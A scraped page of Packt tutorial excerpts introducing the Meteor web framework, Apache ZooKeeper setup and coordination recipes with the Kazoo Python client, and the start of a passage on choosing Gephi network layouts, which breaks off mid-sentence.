How-To Tutorials

article-image-building-next-generation-web-meteor

05 Feb 2015

9 min read

Building the next generation Web with Meteor

05 Feb 2015

This article by Fabian Vogelsteller, the author of Building Single-page Web Apps with Meteor, explores the full-stack framework of Meteor. Meteor is not just a JavaScript library such as jQuery or AngularJS. It's a full-stack solution that contains frontend libraries, a Node.js-based server, and a command-line tool. All this together lets us write large-scale web applications in JavaScript, on both the server and client, using a consistent API. (For more resources related to this topic, see here.) Even with Meteor being quite young, already a few companies such as https://lookback.io, https://respond.ly and https://madeye.io use Meteor already in their production environment. If you want to see for yourself what's made with Meteor, take a look at http://madewith.meteor.com. Meteor makes it easy for us to build web applications quickly and takes care of the boring processes such as file linking, minifying, and concatenating of files. Here are a few highlights of what is possible with Meteor: We can build complex web applications amazingly fast using templates that automatically update themselves when data changes We can push new code to all clients on the fly while they are using our app Meteor core packages come with a complete account solution, allowing a seamless integration with Facebook, Twitter, and more Data will automatically be synced across clients, keeping every client in the same state in almost real time Latency compensation will make our interface appear super fast while the server response happens in the background With Meteor, we never have to link files with the <script> tags in HTML. Meteor's command-line tool automatically collects JavaScript or CSS files in our application's folder and links them in the index.html file, which is served to clients on initial page load. This makes structuring our code in separate files as easy as creating them. Meteor's command-line tool also watches all files inside our application's folder for changes and rebuilds them on the fly when they change. Additionally, it starts a Meteor server that serves the app's files to the clients. When a file changes, Meteor reloads the site of every client while preserving its state. This is called a hot code reload. In production, the build process also concatenates and minifies our CSS and JavaScript files. By simply adding the less and coffee core packages, we can even write all styles in LESS and code in CoffeeScript with no extra effort. The command-line tool is also the tool for deploying and bundling our app so that we can run it on a remote server. Sounds awesome? Let's take a look at what's needed to use Meteor Adding basic packages Packages in Meteor are libraries that can be added to our projects. The nice thing about Meteor packages is that they are self-contained units, which run out of the box. They mostly add either some templating functionality or provide extra objects in the global namespace of our project. Packages can also add features to Meteor's build process like the stylus package, which lets us write our app's style files with the stylus pre-processor syntax. Writing templates in Meteor Normally when we build websites, we build the complete HTML on the server side. This was quite straightforward; every page is built on the server, then it is sent to the client, and at last JavaScript added some additional animation or dynamic behavior to it. This is not so in single-page apps, where each page needs to be already in the client's browser so that it can be shown at will. Meteor solves that problem by providing templates that exists in JavaScript and can be placed in the DOM at some point. These templates can have nested templates, allowing for and easy way to reuse and structure an app's HTML layout. Since Meteor is so flexible in terms of folder and file structure, any *.html page can contain a template and will be parsed during Meteor's build process. This allows us to put all templates in the my-meteor-blog/client/templates folder. This folder structure is chosen as it helps us organizing templates while our app grows. Meteor template engine is called Spacebars, which is a derivative of the handlebars template engine. Spacebars is built on top of Blaze, which is Meteor's reactive DOM update engine. Meteor and databases Meteor currently uses MongoDB by default to store data on the server, although there are drivers planned for relational databases, too. If you are adventurous, you can try one of the community-built SQL drivers, such as the numtel:mysql package from https://atmospherejs.com/numtel/mysql. MongoDB is a NoSQL database. This means it is based on a flat document structure instead of a relational table structure. Its document approach makes it ideal for JavaScript as documents are written in BJSON, which is very similar to the JSON format. Meteor has a database everywhere approach, which means we have the same API to query the database on the client as well as on the server. Yet, when we query the database on the client, we are only able to access data that we published to a client. MongoDB uses a datastructure called a collection, which is the equivalent of a table in an SQL database. Collections contain documents, where each document has its own unique ID. These documents are JSON-like structures and can contain properties with values, even with multiple dimensions: { "_id": "W7sBzpBbov48rR7jW", "myName": "My Document Name", "someProperty": 123456, "aNestedProperty": { "anotherOne": "With another string" } } These collections are used to store data in the servers MongoDB as well as the client-sides minimongo collections, which is an in-memory database mimicking the behavior of the real MongoDB. The MongoDB API let us use a simple JSON-based query language to get documents from a collection. We can pass additional options to only ask for specific fields or sort the returned documents. These are very powerful features, especially on the client side, to display data in various ways. Data everywhere In Meteor, we can use the browser console to update data, which means we update the database from the client. This works because Meteor automatically syncs these changes to the server and updates the database accordingly. This is happening because we have the autopublish and insecure core packages added to our project by default. The autopublish package publishes automatically all documents to every client, whereas the insecure package allows every client to update database records by its _id field. Obviously, this works well for prototyping but is infeasible for production, as every client could manipulate our database. If we remove the insecure package, we would need to add the "allow and deny" rules to determine what a client is allowed to update and what not; otherwise all updates will get denied. Differences between client and server collections Meteor has a database everywhere approach. This means it provides the same API on the client as on the server. The data flow is controlled using a publication subscription model. On the server sits the real MongoDB database, which stores data persistently. On the client Meteor has a package called minimongo, which is a pure in-memory database mimicking most of MongoDB's query and update functions. Every time a client connects to its Meteor server, Meteor downloads the documents the client subscribed to and stores them in its local minimongo database. From here, they can be displayed in a template or processed by functions. When the client updates a document, Meteor syncs it back to the server, where it is passed through any allow/deny functions before being persistently stored in the database. This works also in the other way, when a document in the server-side database changes, it will get automatically sync to every client that is subscribed to it, keeping every connected client up to date. Syncing data – the current Web versus the new Web In the current Web, most pages are either static files hosted on a server or dynamically generated by a server on a request. This is true for most server-side-rendered websites, for example, those written with PHP, Rails, or Django. Both of these techniques required no effort besides being displayed by the clients; therefore, they are called thin clients. In modern web applications, the idea of the browser has moved from thin clients to fat clients. This means most of the website's logic resides on the client and the client asks for the data it needs. Currently, this is mostly done via calls to an API server. This API server then returns data, commonly in JSON form, giving the client an easy way to handle it and use it appropriately. Most modern websites are a mixture of thin and fat clients. Normal pages are server-side-rendered, where only some functionality, such as a chat box or news feed, is updated using API calls. Meteor, however, is built on the idea that it's better to use the calculation power of all clients instead of one single server. A pure fat client or a single-page app contains the entire logic of a website's frontend, which is send down on the initial page load. The server then merely acts as a data source, sending only the data to the clients. This can happen by connecting to an API and utilizing AJAX calls, or as with Meteor, using a model called publication/subscription. In this model, the server offers a range of publications and each client decides which dataset it wants to subscribe to. Compared with AJAX calls, the developer doesn't have to take care of any downloading or uploading logic. The Meteor client syncs all of the data automatically in the background as soon as it subscribes to a specific dataset. When data on the server changes, the server sends the updated documents to the clients and vice versa, as shown in the following diagram: Summary Meteor comes with more great ways of building pure JavaScript applications such as simple routing and simple ways to make components, which can be packaged for others to use. Meteor's reactivity model, which allows you to rerun any function and template helpers at will, allows for great consistent interfaces and simple dependency tracking, which is a key for large-scale JavaScript applications. If you want to dig deeper, buy the book and read How to build your own blog as single-page web application in a simple step-by-step fashion by using Meteor, the next generation web! Resources for Article: Further resources on this subject: Quick start - creating your first application [article] Meteor.js JavaScript Framework: Why Meteor Rocks! [article] Marionette View Types and Their Use [article]

0
0
1897

How-To Tutorials

article-image-introduction-apache-zookeeper

Packt

05 Feb 2015

26 min read

Introduction to Apache ZooKeeper

Packt

05 Feb 2015

26 min read

In this article by Saurav Haloi, author of the book a Apache Zookeeper Essentials, we will learn about Apache ZooKeeper is a software project of the Apache Software Foundation; it provides an open source solution to the various coordination problems in large distributed systems. ZooKeeper as a centralized coordination service is distributed and highly reliable, running on a cluster of servers called a ZooKeeper Ensemble. Distributed consensus, group management, presence protocols, and leader election are implemented by the service so that the applications do not need to reinvent the wheel by implementing them on its own. On top of these, the primitives exposed by ZooKeeper can be used by applications to build much more powerful abstractions for solving a wide variety of problems. (For more resources related to this topic, see here.) Apache ZooKeeper is implemented in Java. It ships with C, Java, Perl, and Python client bindings. Community contributed client libraries are available for a plethora of languages like Go, Scala, Erlang, and so on. Apache ZooKeeper is widely used by large number of organizations, such as Yahoo Inc., Twitter, Netflix and Facebook, in their distributed application platforms as a coordination service. In this article we will look into installation and configuration of Apache ZooKeeper, some of the concepts associated with it followed by programming using Python client library of ZooKeeper. We will also read how we can implement some of the important constructs of distributed programming using ZooKeeper. Download and installation ZooKeeper is supported by a wide variety of platforms. GNU/Linux and Oracle Solaris are supported as development and production platforms for both server and client. Windows and Mac OS X are recommended only as development platforms for both server and client. ZooKeeper is implemented in Java and requires Java 6 or later versions to run. Let's download the stable version from one of the mirrors, say Georgia Tech's Apache download mirror (http://b.gatech.edu/1xElxRb) in the following example: $ wgethttp://www.gtlib.gatech.edu/pub/apache/zookeeper/stable/zookeeper-3.4.6.tar.gz$ ls -alh zookeeper-3.4.6.tar.gz-rw-rw-r-- 1 saurav saurav 17M Feb 20 2014 zookeeper-3.4.6.tar.gz Once we have downloaded the ZooKeeper tarball, installing and setting up a standalone ZooKeeper node is pretty simple and straightforward. Let's extract the compressed tar archive into /usr/share: $ tar -C /usr/share -zxf zookeeper-3.4.6.tar.gz$ cd /usr/share/zookeeper-3.4.6/$ lsbin CHANGES.txt contrib docs ivy.xml LICENSE.txtREADME_packaging.txt recipes zookeeper-3.4.6.jar zookeeper-3.4.6.jar.md5build.xml conf dist-maven ivysettings.xml libNOTICE.txt README.txt src zookeeper-3.4.6.jar.asczookeeper-3.4.6.jar.sha1 The location where the ZooKeeper archive is extracted in our case, /usr/share/zookeeper-3.4.6, can be exported as ZK_HOME as follows: $ export ZK_HOME=/usr/share/zookeeper-3.4.6 Configuration Once we have extracted the tarball, the next thing is to configure ZooKeeper. The conf folder holds the configuration files for ZooKeeper. ZooKeeper needs a configuration file called zoo.cfg in the conf folder inside the extracted ZooKeeper folder. There is a sample configuration file that contains some of the configuration parameters for reference. Let's create our configuration file with the following minimal parameters and save it in the conf directory: $ cat conf/zoo.cfgtickTime=2000dataDir=/var/lib/zookeeperclientPort=2181 The configuration parameters' meanings are explained here: tickTime: This is measured in milliseconds; it is used for session registration and to do regular heartbeats by clients with the ZooKeeper service. The minimum session timeout will be twice the tickTime parameter. dataDir: This is the location to store the in-memory state of ZooKeeper; it includes database snapshots and the transaction log of updates to the database. Extracting the ZooKeeper archive won't create this directory, so if this directory doesn't exist in the system, you will need to create it and set writable permission to it. clientPort: This is the port that listens for client connections, so it is where the ZooKeeper clients will initiate a connection. The client port can be set to any number, and different servers can be configured to listen on different ports. The default is 2181. ZooKeeper needs the JAVA_HOME environment variable to be set correctly. To see if this is set in your system, run the following command: $ echo $JAVA_HOME Starting the ZooKeeper server Now, considering that Java is installed and working properly, let's go ahead and start the ZooKeeper server. All ZooKeeper administration scripts to start/stop the server and invoke the ZooKeeper command shell are shipped along with the archive in the bin folder with the following code: $ pwd /usr/share/zookeeper-3.4.6/bin $ ls README.txt zkCleanup.sh zkCli.cmd zkCli.sh zkEnv.cmd zkEnv.sh zkServer.cmd zkServer.sh The scripts with the .sh extension are for Unix platforms (GNU/Linux, Mac OS X, and so on), and the scripts with the .cmd extension are for Microsoft Windows operating systems. To start the ZooKeeper server in a GNU/Linux system, you need to execute the zkServer.sh script as follows. This script gives options to start, stop, restart, and see the status of the ZooKeeper server: $ ./zkServer.sh JMX enabled by default Using config: /usr/share/zookeeper-3.4.6/bin/../conf/zoo.cfg Usage: ./zkServer.sh {start|start-foreground|stop|restart|status|upgrade|print-cmd} To avoid going to the ZooKeeper install directory to run these scripts, you can include it in your PATH variable as follows: export PATH=$PATH:/usr/share/zookeeper-3.4.6/bin Executing zkServer.sh with the start argument will start the ZooKeeper server. A successful start of the server will show the following output: $ zkServer.sh start JMX enabled by default Using config: /usr/share/zookeeper-3.4.6/bin/../conf/zoo.cfg Starting zookeeper ... STARTED To verify that the ZooKeeper server has started, you can use the following ps command: $ ps –ef | grep zookeeper | grep –v grep | awk '{print $2}' 5511 The ZooKeeper server's status can be checked with the zkServer.sh script as follows: $ zkServer.sh status JMX enabled by default Using config: /usr/share/zookeeper-3.4.6/bin/../conf/zoo.cfg Mode: standalone Connecting to ZooKeeper with a Java-based shell To start the Java-based ZooKeeper command-line shell, we simply need to run zkCli.sh of the ZK_HOME/bin folder with the server IP and port as follows: ${ZK_HOME}/bin/zkCli.sh –server zk_server:port In our case, we are running our ZooKeeper server on the same machine, so the ZooKeeper server will be localhost, or the loop-back address will be 127.0.0.1. The default port we configured was 2181: $ zkCli.sh -server localhost:2181 As we connect to the running ZooKeeper instance, we will see the output similar to the following one in the terminal (some output is omitted): Connecting to localhost:2181 ............... ............... Welcome to ZooKeeper! JLine support is enabled ............. WATCHER:: WatchedEvent state:SyncConnected type:None path:null [zk: localhost:2181(CONNECTED) 0] To see a listing of the commands supported by the ZooKeeper Java shell, you can run the help command in the shell prompt: [zk: localhost:2181(CONNECTED) 0] help ZooKeeper -server host:port cmd args connect host:port get path [watch] ls path [watch] set path data [version] rmr path delquota [-n|-b] path quit printwatches on|off create [-s] [-e] path data acl stat path [watch] close ls2 path [watch] history listquota path setAcl path acl getAcl path sync path redo cmdno addauth scheme auth delete path [version] setquota -n|-b val path We can execute a few simple commands to get a feel of the command-line interface. Let's start by running the ls command, which, as in Unix, is used for listing: [zk: localhost:2181(CONNECTED) 1] ls / [zookeeper] Now, the ls command returned a string called zookeeper, which is a znode in the ZooKeeper terminology. We can create a znode through the ZooKeeper shell as follows: To begin with, let's create a HelloWorld znode with empty data. [zk: localhost:2181(CONNECTED) 2] create /HelloWorld "" Created /HelloWorld [zk: localhost:2181(CONNECTED) 3] ls / [zookeeper, HelloWorld] We can delete the znode created by issuing the delete command as follows: [zk: localhost:2181(CONNECTED) 4] delete /HelloWorld [zk: localhost:2181(CONNECTED) 5] ls / [zookeeper] The ZooKeeper data model ZooKeeper allows distributed processes to coordinate with each other through a shared hierarchical namespace of data registers. The namespace looks quite similar to a Unix filesystem. The data registers are known as znodes in the ZooKeeper nomenclature. ZooKeeper has two types of znodes: persistent and ephemeral. There is a third type that you might have heard of, called a sequential znode, which is a kind of a qualifier for the other two types. Both persistent and ephemeral znodes can be sequential znodes as well. The persistent znode As the name suggests, persistent znodes have a lifetime in the ZooKeeper’s namespace until they’re explicitly deleted. A znode can be deleted by calling the delete API call. The ephemeral znode An ephemeral znode is deleted by the ZooKeeper service when the creating client’s session ends. An end to a client’s session can happen because of disconnection due to a client crash or explicit termination of the connection. The sequential znode A sequential znode is assigned a sequence number by ZooKeeper as a part of its name during its creation. The value of a monotonously increasing counter (maintained by the parent znode) is appended to the name of the znode. The ZooKeeper Watches ZooKeeper is designed to be a scalable and robust centralized service for very large distributed applications. A common design anti-pattern associated while accessing such services by clients is through polling or a pull kind of a model. A pull model often suffers from scalability problems when implemented in large and complex distributed systems. To solve this problem, ZooKeeper designers implemented a mechanism where clients can get notifications from the ZooKeeper service instead of polling for events. This resembles a push model, where notifications are pushed to the registered clients of the ZooKeeper service. Clients can register with the ZooKeeper service for any changes associated with a znode. This registration is known as setting a watch on a znode in ZooKeeper terminology. Watches allow clients to get notifications when a znode changes in any way. A watch is a one-time operation, which means that it triggers only one notification. To continue receiving notifications over time, the client must reregister the watch upon receiving each event notification. ZooKeeper watches are a one-time trigger. What this means is that if a client receives a watch event and wants to get notified of future changes, it must set another watch. Whenever a watch is triggered, a notification is dispatched to the client that had set the watch. Watches are maintained in the ZooKeeper server to which a client is connected, and this makes it a fast and lean means of event notification. The watches are triggered for the following three changes to a znode: Any changes to the data of a znode, such as when new data is written to the znode’s data field using the setData operation. Any changes to the children of a znode. For instance, children of a znode are deleted with the delete operation. A znode being created or deleted, which could happen in the event that a new znode is added to a path or an existing one is deleted. Again, ZooKeeper asserts the following guarantees with respect to watches and notifications: ZooKeeper ensures that watches are always ordered in the FIFO manner and that notifications are always dispatched in order Watch notifications are delivered to a client before any other change is made to the same znode The order of the watch events are ordered with respect to the updates seen by the ZooKeeper service ZooKeeper operations ZooKeeper’s data model and its API support the following nine basic operations: Operation Description Operation Event-generating Actions exists A znode is created or deleted, or its data is updated getChildren A child of a znode is created or deleted, or the znode itself is deleted getData A znode is deleted or its data is updated Watches and ZooKeeper operations The read operations in znodes, such as exists, getChildren, and getData, allow watches to be set on them. On the other hand, the watches triggered by znode's write operations, such as create, delete, and setData. ACL operations do not participate in watches. The following are the types of watch events that might occur during a znode state change: NodeChildrenChanged: A znode’s child is created or deleted NodeCreated: A znode is created in a ZooKeeper path NodeDataChanged: The data associated with a znode is updated NodeDeleted: A znode is deleted in a ZooKeeper path Programming with Apache ZooKeeper with Python ZooKeeper is easily programmable and has client binding for a plethora of languages. Its shipped with official Java, C, Perl and Python client libraries. Here we will look at programming ZooKeeper with Python: Apache ZooKeeper is shipped with an official client binding for Python, which is developed on top of the C bindings. It can be found in the contrib/zkpython directory of the ZooKeeper distribution. To build and install the Python binding, refer to the instructions in the README file there. In this section, we will study about another popular Python client library for ZooKeeper, called Kazoo (https://kazoo.readthedocs.org/). Kazoo is a pure Python library for ZooKeeper, which means that unlike the official Python bindings, Kazoo is implemented fully in Python and has no dependency on the C bindings of ZooKeeper. Along with providing both synchronous and asynchronous APIs, the Kazoo library also provides APIs for some distributed data structure primitives such as distributed locks, leader election, distributed queues, and so on. Installation of Kazoo is very simple, which can be done either with pip or easy_install installers: Using pip, Kazoo can be installed with the following command: $ pip install kazoo Using easy_install, Kazoo is installed as follows: $ easy_install kazoo To verify whether Kazoo is installed properly, let's try to connect to the ZooKeeper instance and print the list of znodes in the root path of the tree, as shown in the following screenshot: In the preceding example, we imported the KazooClient, which is the main ZooKeeper client class. Then, we created an object of the class (an instance of KazooClient) by connecting to the ZooKeeper instance that is running on the localhost. Once we called the start() method, it initiates a connection to the ZooKeeper server. Once successfully connected, the instance contains the handle to the ZooKeeper session. Now, when we called the get_children() method on the root path of the ZooKeeper namespace, it returned a list of the children. Finally, we closed the connection by calling the stop() method. A watcher implementation Kazoo provides a higher-level child and data watching API's as a recipe through a module called kazoo.recipe.watchers. This module provides the implementation of DataWatch and ChildrenWatch along with another class called PatientChildrenWatch. The PatientChildrenWatch> class returns values after the children of a node don't change for a period of time, unlike the other two, which return each time an event is generated. Let's look at the implementation of a simple children watcher client, which will generate an event each time a znode is added or deleted from the ZooKeeper path: import signal from kazoo.client import KazooClient from kazoo.recipe.watchers import ChildrenWatch zoo_path = '/MyPath' zk = KazooClient(hosts='localhost:2181') zk.start() zk.ensure_path(zoo_path) @zk.ChildrenWatch(zoo_path) def child_watch_func(children): print "List of Children %s" % children while True: signal.pause() In this simple implementation of a children watcher, we connect to the ZooKeeper server that is running in the localhost, using the following code, and create a path /MyPath: zk.ensure_path(zoo_path) @zk.ChildrenWatch(zoo_path) We then set a children watcher on this path and register a callback method child_watch_func, which prints the current list of children on the event generated in /MyPath. When we run this client watcher in a terminal, it starts listening to events: On another terminal, we will create some znodes in/MyPath with the ZooKeeper shell: We observe that the children watcher client receives these znode creation events, and it prints the list of the current children in the terminal window: Similarly, if we delete the znodes that we just created, the watcher will receive the events and subsequently will print the children listing in the console: The messages shown in the following screenshot are printed in the terminal where the children watcher is running: ZooKeeper recipes In this section, you will learn to develop high-level distributed system constructs and data structures using ZooKeeper. As mentioned earlier, most of these constructs and functions are of utmost importance in building scalable distributed architectures, but they are fairly complicated to implement from scratch. Developers can often get bogged down while implementing these and integrating them with their application logic. In this section, you will learn how to develop algorithms to build some of these high-level functions using ZooKeeper primitives and data model and see how ZooKeeper makes it simple, scalable, and error free, with much lesser code. Barrier Barrier is a type of synchronization method used in distributed systems to block the processing of a set of nodes until a condition is satisfied. It defines a point where all nodes must stop their processing and cannot proceed until all the other nodes reach this barrier. The algorithm to implement a barrier using ZooKeeper is as follows: To start with, a znode is designated to be a barrier znode, say /zk_barrier. The barrier is said to be active in the system if this barrier znode exists . Each client calls the ZooKeeper API's exists() function on /zk_barrier by registering for watch events on the barrier znode (the watch event is set to true). If the exists() method returns false, the barrier no longer exists, and the client proceeds with its computation. Else, if the exists() method returns true, the clients just waits for watch events. Whenever the barrier exit condition is met, the client in charge of the barrier will delete /zk_barrier. The deletion triggers a watch event, and on getting this notification, the client calls the exists() function on /zk_barrier again. Step 7 returns true, and the clients can proceed further. The barrier exists until the barrier znode ceases to exist! In this way, we can implement a barrier using ZooKeeper without much of an effort. The example cited so far is for a simple barrier to stop a group of distributed processes from waiting on some condition and then proceed together when the condition is met. There is another type of barrier that aids in synchronizing the beginning and end of a computation; this is known as double barrier. The logic of a double barrier states that a computation is started when the required number of processes join the barrier. The processes leave after completing the computation, and when the number of processes participating in the barrier become zero, the computation is stated to end. The algorithm for a double barrier is implemented by having a barrier znode that serves the purpose of being a parent for individual process znodes participating in the computation. It's algorithm is outlined as follows: Phase 1: Joining the barrier znode can be done as follows: Suppose the barrier znode is represented by znode/barrier. Every client process registers with the barrier znode by creating an ephemeral znode with /barrier as the parent. In real scenarios, clients might register using their hostnames. The client process sets a watch event for the existence of another znode called ready under the /barrier znode and waits for the node to appear. A number N is predefined in the system; this governs the minimum number of clients to join the barrier before the computation can start. While joining the barrier, each client process finds the number of child znodes of /barrier: M = getChildren(/barrier, watch=false) 5. If M is less than N, the client waits for the watch event registered in step 3. Else, if M is equal to N, then the client process creates the ready znode under /barrier. The creation of the ready znode in step 5 triggers the watch event, and each client starts the computation that they were waiting so far to do. Phase 2: Leaving the barrier can be done as follows: Client processing on finishing the computation deletes the znode it created under /barrier (in step 2 of Phase 1: Joining the barrier). The client process then finds the number of children under /barrier: M = getChildren(/barrier, watch=True) If M is not equal to 0, this client waits for notifications (observe that we have set the watch event to True in the preceding call). If M is equal to 0, then the client exits the barrier znode The preceding procedure suffers from a potential herd effect where all client processes wake up to check the number of children left in the barrier when a notification is triggered. To get away with this, we can use a sequential ephemeral znode to be created in step 2 of Phase 1: Joining the barrier. Every client process watches it's next lowest sequential ephemeral znode to go away as an exit criterion. This way, only a single event is generated for any client completing the computation, and hence, not all clients need to wake up together to check on its exit condition. For a large number of client processes participating in a barrier, the herd effect can negatively impact the scalability of the ZooKeeper service, and developers should be aware of such scenarios. A Java language implementation of a double barrier can be found in the ZooKeeper documentation at http://zookeeper.apache.org/doc/r3.4.6/zookeeperTutorial.html. Queue A distributed queue is a very common data structure used in distributed systems. A special implementation of a queue, called a producer-consumer queue, is where a collection of processes called producers generate or create new items and put them in the queue, while consumer processes remove the items from the queue and process them. The addition and removal of items in the queue follow a strict ordering of first in first out (FIFO). A producer-consumer queue can be implemented using ZooKeeper. A znode will be designated to hold a queue instance, say queue-znode. All queue items are stored as znodes under this znode. Producers add an item to the queue by creating a znode under the queue-znode, and consumers retrieve the items by getting and then deleting a child from the queue-znode. The FIFO order of the items is maintained using sequential property of znode provided by ZooKeeper. When a producer process creates a znode for a queue item, it sets the sequential flag. This lets ZooKeeper append the znode name with a monotonically increasing sequence number as the suffix. ZooKeeper guarantees that the sequence numbers are applied in order and are not reused. The consumer process processes the items in the correct order by looking at the sequence number of the znode. The pseudocode for the algorithm to implement a producer-consumer queue using ZooKeeper is shown here: Let /_QUEUE_ represent the top-level znode for our queue implementation, which is also called the queue-node. Clients acting as producer processes put something into the queue by calling the create() method with the znode name as "queue-" and set the sequence and ephemeral flags if the create() method call is set true: create( “queue-“, SEQUENCE_EPHEMERAL) The sequence flag lets the new znode get a name like queue-N, where N is a monotonically increasing number Clients acting as consumer processes process a getChildren() method call on the queue-node with a watch event set to true: M = getChildren(/_QUEUE_, true) It sorts the children list M, takes out the lowest numbered child znode from the list, starts processing on it by taking out the data from the znode, and then deletes it. The client picks up items from the list and continues processing on them. On reaching the end of the list, the client should check again whether any new items are added to the queue by issuing another get_children() method call. > The algorithm continues when get_children() returns an empty list; this means that no more znodes or items are left under /_QUEUE_. It's quite possible that in step 3, the deletion of a znode by a client will fail because some other client has gained access to the znode while this client was retrieving the item. In such scenarios, the client should retry the delete call. Using this algorithm for implementation of a generic queue, we can also build a priority queue out of it, where each item can have a priority tagged to it. The algorithm and implementation is left as an exercise to the readers. C and Java implementations of the distributed queue recipe are shipped along with the ZooKeeper distribution under the recipes folder. Developers can use this recipe to implement distributed lock in their applications. Kazoo, the Python client library for ZooKeeper, has distributed queue implementations inside the kazoo.recipe.queue module. This queue implementation has priority assignment to the queue items support as well as queue locking support that are built into it. Lock A lock in a distributed system is an important primitive that provides the applications with a means to synchronize their access to shared resources. Distributed locks need to be globally synchronous to ensure that no two clients can hold the same lock at any instance of time. Typical scenarios where locks are inevitable are when the system as a whole needs to ensure that only one node of the cluster is allowed to carry out an operation at a given time, such as: Write to a shared database or file Act as a decision subsystem Process all I/O requests from other nodes ZooKeeper can be used to implement mutually exclusive locks for processes that run on different servers across different networks and even geographically apart. To build a distributed lock with ZooKeeper, a persistent znode is designated to be the main lock-znode. Client processes that want to acquire the lock will create an ephemeral znode with a sequential flag set under the lock-znode. The crux of the algorithm is that the lock is owned by the client process whose child znode has the lowest sequence number. ZooKeeper guarantees the order of the sequence number, as sequence znodes are numbered in a monotonically increasing order. Suppose there are three znodes under the lock-znode: l1, l2, and l3. The client process that created l1 will be the owner of the lock. If the client wants to release the lock, it simply deletes l1, and then, the owner of l2 will be the lock owner and so on. The pseudocode for the algorithm to implement a distributed lock service with ZooKeeper is shown here: Let the parent lock node be represented by a persistent znode, /_locknode_, in the Zookeeper tree. Phase 1: Acquire a lock with the following steps: Call the create("/_locknode_/lock-",CreateMode=EPHEMERAL_SEQUENTIAL) method. Call the getChildren("/_locknode_/lock-", false) method on the lock node. Here, the watch flag is set to false, as otherwise, it can lead to a herd effect. If the znode created by the client in step 1 has the lowest sequence number suffix, then the client is owner of the lock, and it exits the algorithm. Call the exists("/_locknode_/, True) method. If the exists() method returns false, go to step 2. If the exists() method returns true, wait for notifications for the watch event set in step 4. Phase 2: Release a lock as follows: The client holding the lock deletes the node, thereby triggering the next client in line to acquire the lock. The client that created the next higher sequence node will be notified and hold the lock. The watch for this event was set in step 4 of Phase 1,:Acquire a lock. While it's not recommended that you use a distributed system with a large number of clients due to the herd effect, if the other clients also need to know about the change of lock ownership, they could set a watch on the /_locknode_ lock node for events of the NodeChildrenChanged type and can determine the current owner. If there was a partial failure in the creation of znode due to connection loss, it's possible that the client won't be able to correctly determine whether it successfully created the child znode. To resolve such a situation, the client can store its session ID in the znode data field or even as a part of the znode name itself. As a client retains the same session ID after a reconnect, it can easily determine whether the child znode was created by it by looking at the session ID. The idea of creating an ephemeral znode prevents a potential dead-lock situation that might arise when a client dies while holding a lock. However, as the property of the ephemeral znode dictates that it gets deleted when the session times out or expires, ZooKeeper will delete the znode created by the dead client, and the algorithm runs as usual. However, if the client hangs for some reason but the ZooKeeper session is still active, then we might get into a deadlock. This can be solved by having a monitor client that triggers an alarm when the lock holding time for a client crosses a predefined time out. The ZooKeeper distribution is shipped with the C and Java language implementation of a distributed lock in the recipes folder. The recipe implements the algorithm you have learned so far and also takes into account the problems associated with partial failure and herd effect. The previous recipe of a mutually exclusive lock can be modified to implement a shared lock as well. Readers can find the algorithm and pseudocode for a shared lock using Zookeeper in the documentation at http://zookeeper.apache.org/doc/r3.4.6/recipes.html#Shared+Locks. More ZooKeeper recipes are available at: http://zookeeper.apache.org/doc/trunk/recipes.html Summary In this article, we read about the fundamentals of Apache ZooKeeper, programming it and how to implement common distributed data structures with ZooKeeper. For more details on Apache ZooKeeper, please visit its project page. Resources for Article: Further resources on this subject: Creating an Apache JMeter™ test workbench [article] Apache Maven and m2eclipse [article] Coverage with Apache Karaf Pax Exam tests [article]

0
0
5305

Packt

05 Feb 2015

11 min read

Selecting the Layout

Packt

05 Feb 2015

11 min read

In this article by Ken Cherven, author of the book, Mastering Gephi Network Visualization, we will learn how to select the most appropriate types based on the characteristics of your network data. (For more resources related to this topic, see here.) Assessing your graphing needs Now that you have seen the broad array of available layout options and a bit of their respective capabilities, it is time to step back and reconsider what story you want to tell through the data. As you have just seen, there are many directions you can take within Gephi, and there is no absolute standard for right or wrong in your layout selection. However, there are some simple guidelines that can be followed to help narrow the choices. If you are experienced with Gephi or another network analysis tool, you might wish to dive directly into the next section and begin assessing each layout type using your very own dataset; I will not attempt to convince you otherwise. This is a great way to quickly learn the basics of every layout offering and can be a great experience. On the other hand, if you wish to take a more focused approach, I will offer you a brief checklist of considerations that might help to narrow your pool of layout candidates, allowing you to spend more time with those likely to provide the best results. Think of this as akin to shopping for clothes —you could try on every type of clothing on the rack, or you can quickly narrow your choices based on certain criteria—body type, complementary colors, preferred styles, and so on. So let's have a look at some of the basic points to consider while shopping for an appropriate layout: What is the goal of your analysis? Are you attempting to show complementarity within the network, as in the relationships between nodes or sets of nodes, or is the goal to display divisions within the data? Does geography play a critical role in the network? Perhaps you are seeking to sort or rank networks based on some attribute within the data. Each of these factors can play a determining role in which layout algorithm is best for your specific network. Is the dataset small, medium, or large? Admittedly, this is a subjective criteria, but we can put some general bounds around these definitions. In my mind, if the number of nodes is measured in tens or dozens, then this is likely a small dataset that can be easily displayed in a conventional space—the Gephi workspace window or a simple letter-sized paper for a printed version. If, however, the nodes run into the hundreds, we are now moving away from a very simple network and potentially reducing the number of practical layout options. When the number of nodes in a network moves into the thousands and beyond, we have what can practically be considered a large network, at least for display considerations. With datasets of this scope, additional display considerations come into play, such as judicious use of filters, layers, and interactivity. How densely connected is the network? In our previous example using the power grid data, we had a fairly large dataset numbering in the thousands, but one that was not highly connected, at least as compared to social networks. In that case, we might have an easier time selecting and applying an effective layout, while the highly connected nature of social networks presents an additional challenge. Does the network exhibit certain measurable behaviors such as clustering and homophily? In some cases, we might not know this until the network has been visually and programmatically analyzed, but in others we might already know that the data is likely to cluster based on certain attributes that influence the network structure, including geographic proximity, alumni networks, professional associations, and a host of other possibilities. Knowing some of these in advance might help guide us either toward or away from specific layout types. Will the network be displayed on a single level, or will it be bipartite or multipartite? In this case some networks might be hierarchical, with individuals (for example) linking only to an organization, and not to other individuals in the network. There are many instances where we will wish to present hierarchical networks in this fashion. This could be used to display corporate structures, academic hierarchies, player to team relationships, and so on, and requires some different considerations than networks without this structure. Does the data have a temporal element? In simple terms, will the story be told more effectively by viewing network changes over time? This can be very effective in showing diffusion/contagion patterns, random growth, and simple shifts in behavior within a network, for example—were Thomas and James friends at T1, but no longer so at T3 (where T equals time)? If our data has a specific time element, this leads to identify layouts that will best display these changes and tell an effective story. Will the network be interactive on the user end, or will it be static? This can ultimately lead to a different layout selection when users have the ability to navigate a network via the Web. You might have additional considerations, including the speed of the layout algorithm, but the preceding list should help you to narrow the list of practical layouts, allowing you to test the remaining candidates. Actual example – the Miles Davis network Let's walk through a process following the preceding guidelines, and applying them to a project previously created by me. This will help us migrate from the theoretical constructs above to a practical application of many 